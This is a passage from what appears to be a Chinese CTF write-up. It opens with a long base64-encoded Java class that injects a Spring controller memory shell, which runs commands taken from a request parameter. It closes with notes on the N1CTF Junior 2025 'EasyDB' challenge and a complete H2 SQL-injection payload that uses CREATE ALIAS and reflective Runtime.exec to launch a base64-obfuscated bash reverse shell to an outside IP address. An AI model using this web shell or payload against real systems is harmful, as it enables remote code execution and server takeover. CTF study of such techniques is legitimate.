BwCPCgAPAJAKAJEAkgoAFgCTCACUCgAWAJUKABYAlgoAFgCXCgAWAJgKAJkAmgoAmQCbCgCZAJgIAJwLAJ0Angc
AnwcAoAsAJAChBwCiCABLBwCjCgApAKQHAKUIAKYKACsAjAcApwcAqAoALgCpBwCqBwCrBwCsBwCtBwCuBwCvCg
AxALAIAEkKACcAsQoAJQCyBwCzCgA7ALQHALUBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABENvZ
GUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAARhcmdzAQATW0xqYXZhL2xhbmcvU3Ry
aW5nOwEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABHRoaXMBABRMSW5qZWN0VG9Db250cm9sbGV
yOwEAA2FhYQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHRlc3QBAAMoKVYBAAFwAQAaTGphdmEvbGFuZy9Qcm9jZX
NzQnVpbGRlcjsBAAFvAQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZ
XQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBT
ZXJ2bGV0UmVzcG9uc2U7AQAEYXJnMAEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEADVN0YWNrTWF
wVGFibGUHAKIHALYHALcHAIkHALgHAIgHAI8BAApFeGNlcHRpb25zBwC5AQAIPGNsaW5pdD4BAAdjb250ZXh0AQ
A3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAFW1hcHBpb
mdIYW5kbGVyTWFwcGluZwEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5u
b3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEAB21ldGhvZDIBABpMamF2YS9sYW5nL3JlZmx
lY3QvTWV0aG9kOwEAA3VybAEASExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb2
4vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAAm1zAQBOTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZ
XQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247AQAEaW5mbwEAP0xvcmcvc3By
aW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEAEmluamVjdFR
vQ29udHJvbGxlcgEABHZhcjcBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsHALMBAApTb3VyY2VGaWxlAQAXSW5qZW
N0VG9Db250cm9sbGVyLmphdmEMAEUATAcAugwAuwC8AQBAb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4d
C9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwwAvQC+DAC/AMABAANjbWQHALYMAMEAwgcAtwwAwwDE
AQAAAQAHb3MubmFtZQcAxQwAxgDCDADHAMgBAAN3aW4MAMkAygEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgE
AEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAEUAPwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC
9TY2FubmVyDADLAMwHAM0MAM4AzwwARQDQAQADXFxBDADRANIMANMA1AwA1QDIDADWAEwHALgMANcARgwA2ABMA
QA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwDZDADa
ANsBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9
zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSG
FuZGxlck1hcHBpbmcMANwA3QEAEkluamVjdFRvQ29udHJvbGxlcgEAD2phdmEvbGFuZy9DbGFzcwwA3gDfAQBGb
3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5zUmVxdWVzdENvbmRp
dGlvbgEACC9lZGlhaXN1AQBMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1J
lcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbgEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3
RhdGlvbi9SZXF1ZXN0TWV0aG9kDABFAOABAD1vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZ
XRob2QvUmVxdWVzdE1hcHBpbmdJbmZvAQBEb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29u
ZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb24BAEVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L21
2Yy9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb24BAEZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZX
J2bGV0L212Yy9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uAQBGb3JnL3NwcmluZ2ZyYW1ld29ya
y93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbgEAPm9yZy9zcHJpbmdm
cmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uDABFAOEMAEUARgwA4gD
jAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwA5ABMAQAQamF2YS9sYW5nL09iamVjdAEAJWphdmF4L3NlcnZsZXQvaH
R0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE
2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93
ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGV
zAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOw
EACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc
3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVy
AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2l
vL1ByaW50V3JpdGVyOwEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAUKC
lMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEABXN0Y
XJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEA
FygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGV
yAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leH
QBAAVjbG9zZQEABXdyaXRlAQAFZmx1c2gBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc
3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9s
YW5nL09iamVjdDsBAAdnZXRCZWFuAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWd
ldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZW
N0L01ldGhvZDsBADsoW0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ld
GhvZDspVgEB9ihMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5z
UmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1J
lcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdm
MvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZ
XQvbXZjL2NvbmRpdGlvbi9IZWFkZXJzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIv
c2VydmxldC9tdmMvY29uZGl0aW9uL0NvbnN1bWVzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29
yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2
ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RDb25kaXRpb247KVYBAA9yZWdpc3Rlc
k1hcHBpbmcBAG4oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9SZXF1ZXN0TWFw
cGluZ0luZm87TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDspVgEAD3ByaW50U3R
hY2tUcmFjZQAhACcAPQAAAAAABAAJAD4APwABAEAAAAArAAAAAQAAAAGxAAAAAgBBAAAABgABAAAAFgBCAAAADA
ABAAAAAQBDAEQAAAABAEUARgABAEAAAAA9AAEAAgAAAAUqtwABsQAAAAIAQQAAAAoAAgAAABcABAAYAEIAAAAWA
AIAAAAFAEcASAAAAAAABQBJAEoAAQABAEsATAACAEAAAAGhAAYACAAAALe4AALAAAO2AARMuAACwAADtgAFTSsS
BrkABwIATiy5AAgBADoELcYAkBIJOgUSCrgAC7YADBINtgAOmQAhuwAPWQa9ABBZAxIRU1kEEhJTWQUtU7cAEzo
GpwAeuwAPWQa9ABBZAxIUU1kEEhVTWQUtU7cAEzoGuwAWWRkGtgAXtgAYtwAZEhq2ABs6BxkHtgAcmQALGQe2AB
2nAAUZBToFGQe2AB4ZBBkFtgAfGQS2ACAZBLYAIbEAAAADAEEAAABCABAAAAAeAAoAHwAUACAAHQAhACUAIgApA
CMALQAlAD0AJgBbACgAdgAuAIwALwCgADAApQAxAKwAMgCxADMAtgA5AEIAAABcAAkAWAADAE0ATgAGAC0AiQBP
AEoABQB2AEAATQBOAAYAjAAqAFAAUQAHAAAAtwBHAEgAAAAKAK0AUgBTAAEAFACjAFQAVQACAB0AmgBWAEoAAwA
lAJIAVwBYAAQAWQAAAC4ABf8AWwAGBwBaBwBbBwBcBwBdBwBeBwBdAAD8ABoHAF/8ACUHAGBBBwBd+AAXAGEAAA
AEAAEAYgAIAGMATAABAEAAAAE1AAkABwAAAIK4AAISIgO5ACMDAMAAJEsqEiW5ACYCAMAAJUwSJxIoA70AKbYAK
k27ACtZBL0AEFkDEixTtwAtTrsALlkDvQAvtwAwOgS7ADFZLRkEAcAAMgHAADMBwAA0AcAANQHAADa3ADc6BbsA
J1kSOLcAOToGKxkFGQYstgA6pwAISyq2ADyxAAEAAAB5AHwAOwADAEEAAAAyAAwAAABAAA8AQQAbAEIAJwBDADg
ARABFAEUAZQBGAHAARwB5AEoAfABIAH0ASQCBAE8AQgAAAFIACAAPAGoAZABlAAAAGwBeAGYAZwABACcAUgBoAG
kAAgA4AEEAagBrAAMARQA0AGwAbQAEAGUAFABuAG8ABQBwAAkAcABIAAYAfQAEAHEAcgAAAFkAAAAJAAL3AHwHA
HMEAAEAdAAAAAIAdQ==\"),org.springframework.util.ClassUtils.getDefaultClassLoader())\n"+
"$$\n";

例题

[N1CTF Junior 2025]EasyDB

jadx 反编译一下，login 路由用 UserService.validateUser 来处理输入的账号密码

直接插入 sql 语句中，用 SecurityUtils.check 处理完整的 sql 语句

是个黑名单

很明显就是打 sql 注入，要绕下黑名单，看依赖可以发现是 h2 的数据库，打 Alias Script RCE ，直接拼接绕过就好了

admin'; CREATE ALIAS evil AS $$void poc(String cmd) throws Exception{ String R="R"+"untime";Class<?> c = Class.forName("java.lang."+R);Object rt=c.getMethod("get"+R).invoke(null);c.getMethod("exe"+"c",String.class).invoke(rt,cmd);}$$;CALL evil('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDAuMTk1LjE5NC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}'); --